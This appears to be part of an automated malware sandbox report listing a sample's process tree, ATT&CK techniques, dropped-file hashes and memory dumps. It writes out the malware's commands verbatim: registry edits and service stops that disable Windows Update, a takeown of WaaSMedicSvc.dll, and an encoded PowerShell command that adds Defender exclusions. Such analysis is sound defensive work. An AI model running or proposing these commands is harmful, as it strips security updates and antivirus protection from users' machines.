reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2024

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1784

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4928

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3408

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4900

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1440

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:1748

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:2688

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:736

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
PID:4896

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
PID:1464

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
PID:1008

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
PID:4528

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "vqtwwwbrwdqzx"
3⤵
PID:3384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
Filesize
204.4MB

MD5
8fcd573c0e24743453327d4167cc387c

SHA1
56b592450c390d809be2567409f4398f6c5defaf

SHA256
a564bf32031a2f19899207a274c1ead8cfbdfde2ecfc06de6ac6ef2fe831ae17

SHA512
9fa8ebc3f15333817e58c129e5cac4b3a1aee58a1b4780d14fca86498b90339ebefa0cd2be7669d1e689180c9e78a47f1b4f98057c69fc4d9b8582d80c678f43

Download Submit
C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
Filesize
206.0MB

MD5
d9875c9983f950897168754236e0c301

SHA1
1e97793a32d66672ca6a700237dd34b5a687edab

SHA256
25edc27dd3091fc6f6f2fa08a3a32b4cc73a04dbd6402c09be1fbbe8e8c79083

SHA512
3ffd72234e66df7990635fedacdb2a58b19649ac992ef7b4d1e9bd189bbc1e115fc7708cee7f74493eb539a6e9cfbb7f8328e59cc1d1608600b3f974c200cb74

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplor.exe
Filesize
257.2MB

MD5
50b2d4c537c41ee445eed231cf5f62fb

SHA1
f5653748864e939f535f049e234d000cdb76be4d

SHA256
4d47524b542b158f8014ba6af8f23005b88e6995edb69678494fa7b8ab3615a8

SHA512
03bc537d6f13ee3411f14d19c4f9a6ba0259c165fef75d7a06d8a636eee246a057b422393c9e7929d2edfc58513ceefffa3df255445b9502b3ea7f3826b84465

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplor.exe
Filesize
252.5MB

MD5
3c9418065a023a26ccb5bd03a2797079

SHA1
7c4d9f718ff45adc8043aef5b0e72462608873e8

SHA256
2c3174957dd30d5891d33b428654203e1a893d034477e454321055d81a1e8eb9

SHA512
374b1dd1358f71c435adc5c52163d0d8707b2f35abade9fe48e982af7636887e629039d6391d0dfbb19cddcec8020fe18fcdfbaf68868c24ad5055607956c6c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
234.9MB

MD5
48c152769b651dbd8b0ab4766287b469

SHA1
657651ab17f9179742473f94860bb1065b29b211

SHA256
b0a4b6f168ac179f0c5bbc7ffd6de40f29465045a72ab6a3e8396971c79b81d9

SHA512
15bafc46ce0769809bffd5f61c06f96bd7eb9048bc594af3da465460c60a18ada16f0396e664c27ab2d5514891b3de3ff68590fa1124e9e52e535cec75b8749b

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
236.0MB

MD5
b167a2720d97e0dd791ec0809c2b5f7a

SHA1
bed1d34b8661c4c04cd77394a5fb4b4c56c3150c

SHA256
94bf2c1f442d8eb113806d1015bcf754896c61b8f517f848f45e6cfafe4d6b27

SHA512
00f51b8a06f089bcaff4faaf304790724fc86b6a643d09d3540c7ddf664a6ccf307687423710bb5de42b358c57406f867da09af33ccd171537248879dba8dc45

Download Submit
memory/220-177-0x0000000000000000-mapping.dmp

Download
memory/316-145-0x0000000000000000-mapping.dmp

Download
memory/640-162-0x0000000000000000-mapping.dmp

Download
memory/736-201-0x0000000000000000-mapping.dmp

Download
memory/864-156-0x0000000000000000-mapping.dmp

Download
memory/1008-196-0x0000000000000000-mapping.dmp

Download
memory/1088-165-0x0000000000000000-mapping.dmp

Download
memory/1172-174-0x0000000000000000-mapping.dmp

Download
memory/1268-191-0x00000272AC790000-0x00000272AC7AA000-memory.dmp

Filesize
104KB

Download
memory/1268-193-0x00000272AC770000-0x00000272AC776000-memory.dmp

Filesize
24KB

Download
memory/1268-185-0x0000000000000000-mapping.dmp

Download
memory/1268-192-0x00000272AC740000-0x00000272AC748000-memory.dmp

Filesize
32KB

Download
memory/1268-189-0x00000272AC750000-0x00000272AC76C000-memory.dmp

Filesize
112KB

Download
memory/1268-194-0x00000272AC780000-0x00000272AC78A000-memory.dmp

Filesize
40KB

Download
memory/1268-190-0x00000272AC730000-0x00000272AC73A000-memory.dmp

Filesize
40KB

Download
memory/1268-188-0x00007FFADBFE0000-0x00007FFADCAA1000-memory.dmp

Filesize
10.8MB

Download
memory/1268-187-0x00000272AC5E0000-0x00000272AC5EA000-memory.dmp

Filesize
40KB

Download
memory/1268-186-0x00000272AC500000-0x00000272AC51C000-memory.dmp

Filesize
112KB

Download
memory/1284-159-0x0000000000000000-mapping.dmp

Download
memory/1436-164-0x0000000000000000-mapping.dmp

Download
memory/1436-199-0x0000000000000000-mapping.dmp

Download
memory/1440-204-0x0000000000000000-mapping.dmp

Download
memory/1444-217-0x0000000000000000-mapping.dmp

Download
memory/1464-197-0x0000000000000000-mapping.dmp

Download
memory/1464-161-0x0000000000000000-mapping.dmp

Download
memory/1512-218-0x0000000000000000-mapping.dmp

Download
memory/1684-222-0x0000000000000000-mapping.dmp

Download
memory/1684-176-0x0000000000000000-mapping.dmp

Download
memory/1712-163-0x0000000000000000-mapping.dmp

Download
memory/1748-203-0x0000000000000000-mapping.dmp

Download
memory/1784-171-0x0000000000000000-mapping.dmp

Download
memory/1784-215-0x0000000000000000-mapping.dmp

Download
memory/1844-140-0x0000000000000000-mapping.dmp

Download
memory/1844-143-0x00000000006D0000-0x00000000008EC000-memory.dmp

Filesize
2.1MB

Download
memory/1844-144-0x00007FFADBED0000-0x00007FFADC991000-memory.dmp

Filesize
10.8MB

Download
memory/2024-216-0x0000000000000000-mapping.dmp

Download
memory/2164-150-0x0000000005F30000-0x0000000005FC2000-memory.dmp

Filesize
584KB

Download
memory/2164-133-0x0000000000000000-mapping.dmp

Download
memory/2164-134-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2164-139-0x0000000005260000-0x00000000052C6000-memory.dmp

Filesize
408KB

Download
memory/2164-149-0x0000000006400000-0x00000000069A4000-memory.dmp

Filesize
5.6MB

Download
memory/2184-214-0x0000000000000000-mapping.dmp

Download
memory/2248-155-0x0000000000000000-mapping.dmp

Download
memory/2444-178-0x0000000000000000-mapping.dmp

Download
memory/2456-207-0x0000000000000000-mapping.dmp

Download
memory/2472-184-0x0000000000000000-mapping.dmp

Download
memory/2512-170-0x0000000000000000-mapping.dmp

Download
memory/2528-220-0x0000000000000000-mapping.dmp

Download
memory/2544-221-0x0000000000000000-mapping.dmp

Download
memory/2544-175-0x0000000000000000-mapping.dmp

Download
memory/2688-202-0x0000000000000000-mapping.dmp

Download
memory/2720-158-0x0000000000000000-mapping.dmp

Download
memory/3088-167-0x0000000000000000-mapping.dmp

Download
memory/3104-157-0x0000000000000000-mapping.dmp

Download
memory/3344-166-0x0000000000000000-mapping.dmp

Download
memory/3384-225-0x00007FFADC090000-0x00007FFADCB51000-memory.dmp

Filesize
10.8MB

Download
memory/3384-224-0x000001C106630000-0x000001C106645000-memory.dmp

Filesize
84KB

Download
memory/3408-206-0x0000000000000000-mapping.dmp

Download
memory/3488-172-0x0000000000000000-mapping.dmp

Download
memory/3712-153-0x0000000000000000-mapping.dmp

Download
memory/3828-154-0x0000000000000000-mapping.dmp

Download
memory/3836-152-0x0000000000000000-mapping.dmp

Download
memory/3980-148-0x00007FFADBED0000-0x00007FFADC991000-memory.dmp

Filesize
10.8MB

Download
memory/3980-147-0x0000025E4E620000-0x0000025E4E642000-memory.dmp

Filesize
136KB

Download
memory/3980-146-0x0000000000000000-mapping.dmp

Download
memory/4140-173-0x0000000000000000-mapping.dmp

Download
memory/4364-223-0x0000000000000000-mapping.dmp

Download
memory/4424-179-0x0000000000000000-mapping.dmp

Download
memory/4492-169-0x0000000000000000-mapping.dmp

Download
memory/4516-212-0x000000001F410000-0x000000001F422000-memory.dmp

Filesize
72KB

Download
memory/4516-183-0x00007FFADBFE0000-0x00007FFADCAA1000-memory.dmp

Filesize
10.8MB

Download
memory/4528-209-0x0000000000401BEA-mapping.dmp

Download
memory/4528-211-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4528-208-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4584-130-0x0000000000000000-mapping.dmp

Download
memory/4612-180-0x0000000000000000-mapping.dmp

Download
memory/4736-195-0x0000000000000000-mapping.dmp

Download
memory/4768-151-0x0000000000000000-mapping.dmp

Download
memory/4824-219-0x0000000000000000-mapping.dmp

Download
memory/4896-198-0x0000000000000000-mapping.dmp

Download
memory/4900-205-0x0000000000000000-mapping.dmp

Download
memory/4928-213-0x0000000000000000-mapping.dmp

Download
memory/4960-160-0x0000000000000000-mapping.dmp

Download
memory/5076-168-0x0000000000000000-mapping.dmp

Download
memory/5080-200-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads